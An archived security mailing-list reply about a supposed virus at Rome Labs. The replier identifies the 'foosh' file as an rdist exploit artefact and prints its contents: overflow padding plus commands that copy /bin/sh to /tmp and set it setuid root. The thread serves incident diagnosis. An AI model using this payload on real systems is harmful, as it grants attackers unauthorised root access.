Re: Possible virus from Rome labs

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Aggelos D. Keromitis: "Re: Possible virus from Rome labs"
• Previous message: Gene Spafford: "Re: Possible virus from Rome labs"
• In reply to: Steve Simmons: "Re: Possible virus from Rome labs"
• Next in thread: Aggelos D. Keromitis: "Re: Possible virus from Rome labs"

>> I just got a call from Liz Keane at Rome Labs.  Apparently they
>> have had a virus up there at Rome.  It may be passed through
>> ftp and we have ftp'd them some files lately.
>> She said the virus puts two files in some random place on your system.
>> The files are:
>> 
>> jnk.tmp
>> foosh

sounds like Crackers to me, not a virus.

if foosh contains some thing like

 Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 Qaaaaaaaaaaaaaaaaaaaaaaaaaa
 Qaaaaaaaaaaaaaaaaaaaaaaaaa
 Qaaaaaaaaaaaaaaaaaaaaaaaa
 Qaaaaaaaaaaaaaaaaaaaaaaa
 Scp /bin/sh /tmp/foosh
 Schmod 4755 /tmp/foosh


then it was something a person used to get root through a old hole in rdist
(when I look for the file foosh I found it in my directory of security toys)


as for jnk.tmp I am not sure yet.

• Next message: Aggelos D. Keromitis: "Re: Possible virus from Rome labs"
• Previous message: Gene Spafford: "Re: Possible virus from Rome labs"
• In reply to: Steve Simmons: "Re: Possible virus from Rome labs"
• Next in thread: Aggelos D. Keromitis: "Re: Possible virus from Rome labs"